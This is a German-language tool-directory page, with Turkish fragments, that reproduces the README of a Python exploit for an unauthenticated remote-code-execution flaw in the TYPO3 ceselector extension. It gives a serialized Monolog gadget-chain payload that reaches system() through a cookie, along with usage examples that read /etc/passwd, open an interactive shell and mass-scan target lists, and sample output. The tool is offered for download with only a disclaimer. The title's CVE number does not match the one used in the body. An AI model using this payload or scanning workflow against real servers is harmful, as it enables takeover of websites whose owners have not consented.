Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-46275 — Python-Exploit für CVE-2026-46725, der eine nicht authentifizierte Remote-Code-Ausführung in der TYPO3-Erweiterung ceselector mittels PHP-Objektinjektion und Monolog-Gadget-Kette ermöglicht. | Kitploit
Tools/GitHubGitHub/xxconi/cve-2026-46275
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubxxconi/cve-2026-46275

CVE-2026-46275

Python-Exploit für CVE-2026-46725, der eine nicht authentifizierte Remote-Code-Ausführung in der TYPO3-Erweiterung ceselector mittels PHP-Objektinjektion und Monolog-Gadget-Kette ermöglicht.

Repository anzeigen
5vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-46725 — TYPO3 ceselector Erweiterung RCE

PHP-Objekt-Injection via unserialize() Cookie Bypass → Remotecodeausführung

CVSS CWE Auth Python License


📋 Inhaltsverzeichnis

  • Über die Schwachstelle
  • Technische Details
  • Anforderungen
  • Installation
  • Verwendung
  • Beispiele
  • Ausgabeformat
  • Wie es funktioniert
  • Referenzen
  • Rechtlicher Hinweis

  • 🔍 Über die Schwachstelle

    FeldDetail
    CVE IDCVE-2026-46725
    ProduktTYPO3 ceselector Erweiterung (mmc/ceselector)
    Betroffene Version<= 1.1.3
    SchwachstellentypUnsicheres Deserialisieren (PHP-Objekt-Injection)
    CVSS-Score9.8 Kritisch
    CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-502 (Deserialisierung nicht vertrauenswürdiger Daten)
    EPSS-Score0.0046 (%64.3 percentile)
    AuthentifizierungNicht erforderlich (Unauthentifiziert)
    AuswirkungFull RCE — Vollständige Systemkontrolle
    ForscherDhiyaneshDk

    Beschreibung

    Die TYPO3 ceselector-Erweiterung übergibt den Cookie-Wert T3_ceselector_* ohne Validierung direkt an die Funktion unserialize(). Ein Angreifer kann durch Platzieren eines speziell präparierten PHP-Objekt-Injection-Payloads in diesem Cookie beliebige Befehle auf dem Server ausführen.

    ⚠️ Voraussetzung: Damit die Schwachstelle ausgenutzt werden kann, muss in der TYPO3-Konfiguration der Modus Persistent Mode: Static aktiviert sein.


    🔧 Technische Details

    Angriffsablauf

    root@kitploit:~
    1. GET /  →  Sunucu Set-Cookie: T3_ceselector_<id>=<value> döner
    2. GET /  →  Cookie: T3_ceselector_<id>=<PAYLOAD>
                 └─ PHP unserialize() tetiklenir
                 └─ Monolog Gadget Chain çalışır
                 └─ system("id") çıktısı response'a yansır
    

    Gadget Chain

    root@kitploit:~
    Monolog\Handler\GroupHandler
      └─ Monolog\Handler\BufferHandler
           └─ Monolog\LogRecord (buffer)
                └─ processors: [get_object_vars, end, system]
                     └─ system("<CMD>")  ← RCE
    

    Payload-Struktur

    root@kitploit:~
    O:28:"Monolog\Handler\GroupHandler":1:{
      s:11:"*handlers";a:1:{
        i:0;O:29:"Monolog\Handler\BufferHandler":6:{
          s:10:"*handler";r:3;
          s:13:"*bufferSize";i:1;
          s:14:"*bufferLimit";i:0;
          s:9:"*buffer";a:1:{
            i:0;O:17:"Monolog\LogRecord":2:{
              s:5:"level";E:19:"Monolog\Level:Debug";
              s:5:"mixed";s:2:"id";   ← OS komutu buraya
            }
          }
          s:14:"*initialized";b:1;
          s:13:"*processors";a:3:{
            i:0;s:15:"get_object_vars";
            i:1;s:3:"end";
            i:2;s:6:"system";   ← sink
          }
        }
      }
    }
    

    📦 Anforderungen

    • Python 3.8+
    • requests-Bibliothek
    root@kitploit:~
    Python >= 3.8
    requests >= 2.28.0
    

    ⚙️ Installation

    root@kitploit:~
    # Repoyu klonla
    git clone https://github.com/example/CVE-2026-46725
    cd CVE-2026-46725
    
    # Bağımlılıkları yükle
    pip install requests
    
    # veya requirements.txt ile
    pip install -r requirements.txt
    

    requirements.txt

    root@kitploit:~
    requests>=2.28.0
    urllib3>=1.26.0
    

    🚀 Verwendung

    root@kitploit:~
    usage: CVE-2026-46725 [-h] (-u URL | -l FILE) [-c CMD] [-i]
                          [-t N] [--timeout S] [--proxy URL]
                          [-o FILE] [-v] [--no-color]
    
    options:
    Hedef:
      -u, --url URL       Tek hedef URL
      -l, --list FILE     Hedef listesi (satır başı URL)
    
    Exploit:
      -c, --cmd CMD       Çalıştırılacak OS komutu (varsayılan: id)
      -i, --interactive   Başarılı exploit sonrası interaktif shell aç
    
    Tarama:
      -t, --threads N     Thread sayısı (varsayılan: 10)
      --timeout S         Timeout saniye (varsayılan: 15)
      --proxy URL         Proxy (örn: http://127.0.0.1:8080)
    
    Çıktı:
      -o, --output FILE   Sonuç dosyası
      -v, --verbose       Ayrıntılı çıktı
      --no-color          Renksiz çıktı
    

    📌 Beispiele

    Einzelziel – Grundlegende Verwendung

    root@kitploit:~
    python CVE-2026-46725.py -u https://typo3-site.com
    

    Eigenen Befehl ausführen

    root@kitploit:~
    python CVE-2026-46725.py -u https://typo3-site.com -c "whoami"
    python CVE-2026-46725.py -u https://typo3-site.com -c "cat /etc/passwd"
    python CVE-2026-46725.py -u https://typo3-site.com -c "uname -a"
    

    Interaktive Shell

    root@kitploit:~
    python CVE-2026-46725.py -u https://typo3-site.com --interactive
    
    root@kitploit:~
    typo3@ceselector $ id
    │ uid=33(www-data) gid=33(www-data) groups=33(www-data)
    typo3@ceselector $ uname -a
    │ Linux web01 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
    typo3@ceselector $ pwd
    │ /var/www/html
    typo3@ceselector $ exit
    

    Massenscan

    root@kitploit:~
    # 20 thread ile tara, sonuçları kaydet
    python CVE-2026-46725.py -l targets.txt -t 20 -o results.txt
    
    # 30 thread, özel komut
    python CVE-2026-46725.py -l targets.txt -t 30 -c "id"
    

    Mit Proxy (Burp Suite)

    root@kitploit:~
    python CVE-2026-46725.py -u https://typo3-site.com \
      --proxy http://127.0.0.1:8080 -v
    

    targets.txt-Format

    root@kitploit:~
    https://site1.com
    https://site2.com
    http://site3.com
    site4.com
    

    📊 Ausgabeformat

    Terminalausgabe

    root@kitploit:~
    ① TYPO3 & ceselector Tespit
    ────────────────────────────────────────────────────
    · TYPO3             ✓ Tespit edildi
    · ceselector        ✓ Aktif
    · Cookie Adı        T3_ceselector_48291
    · TYPO3 Sürüm       12.4.3
    
    ② Payload Hazırlanıyor
    ────────────────────────────────────────────────────
    · Teknik            PHP Object Injection → Monolog Gadget Chain
    · Gadget            Monolog\Handler\GroupHandler
    · Sink              system()
    · Komut             id
    
    ④ RCE Çıktısı
    ────────────────────────────────────────────────────
    ┌─ RCE ÇIKTISI ───────────────────────────────────
    │ uid=33(www-data) gid=33(www-data) groups=33(www-data)
    └─────────────────────────────────────────────────
    

    Log-Datei (results.txt)

    root@kitploit:~
    ============================================================
    CVE-2026-46725 — TYPO3 ceselector RCE
    Tarih: 2026-05-26 17:30:00
    ============================================================
    
    [+] RCE ALINAN HEDEFLER (2)
    ----------------------------------------
    URL        : https://typo3-site.com
    Sürüm      : 12.4.3
    Cookie     : T3_ceselector_48291
    Komut      : id
    Çıktı      : uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    🔬 Wie es funktioniert

    root@kitploit:~
    ┌─────────────────────────────────────────────────────────┐
    │                    EXPLOIT AKIŞI                        │
    ├─────────────────────────────────────────────────────────┤
    │                                                         │
    │  1. TESPIT                                              │
    │     GET /  ──────────────────────► TYPO3 Sunucu        │
    │             ◄──── Set-Cookie: T3_ceselector_XXXXX ───── │
    │                                                         │
    │  2. PAYLOAD HAZIRLAMA                                   │
    │     build_payload("id")                                 │
    │     └─ Monolog gadget chain URL-encode edilir           │
    │                                                         │
    │  3. EXPLOIT                                             │
    │     GET /                                               │
    │     Cookie: T3_ceselector_XXXXX=O:28:"Monolog...        │
    │             ──────────────────────► unserialize()       │
    │                                    └─ __destruct()      │
    │                                    └─ system("id")      │
    │             ◄──── uid=33(www-data) gid=33(www-data) ─── │
    │                                                         │
    │  4. DOĞRULAMA                                           │
    │     regex: uid=\d+\([a-z_][a-z0-9_-]*\)\s+gid=...      │
    │                                                         │
    └─────────────────────────────────────────────────────────┘
    

    📚 Referenzen

    • TYPO3 Security Advisory TYPO3-EXT-SA-2026-001
    • Packagist — mmc/ceselector
    • CWE-502: Deserialization of Untrusted Data
    • CVSS 3.1 Calculator

    ⚖️ Rechtlicher Hinweis

    Dieses Tool wurde nur für Bildungszwecke und autorisierte Sicherheitstests entwickelt.

    • Verwenden Sie es nur auf eigenen Systemen oder auf Systemen, für die Sie eine schriftliche Genehmigung haben.
    • Die Verwendung gegen nicht autorisierte Systeme ist illegal und kann rechtliche Konsequenzen haben.
    • Der Entwickler übernimmt keine Haftung für den Missbrauch dieses Tools.

    CVE-2026-46725 | TYPO3 ceselector RCE | Python-Exploit

    Tool herunterladen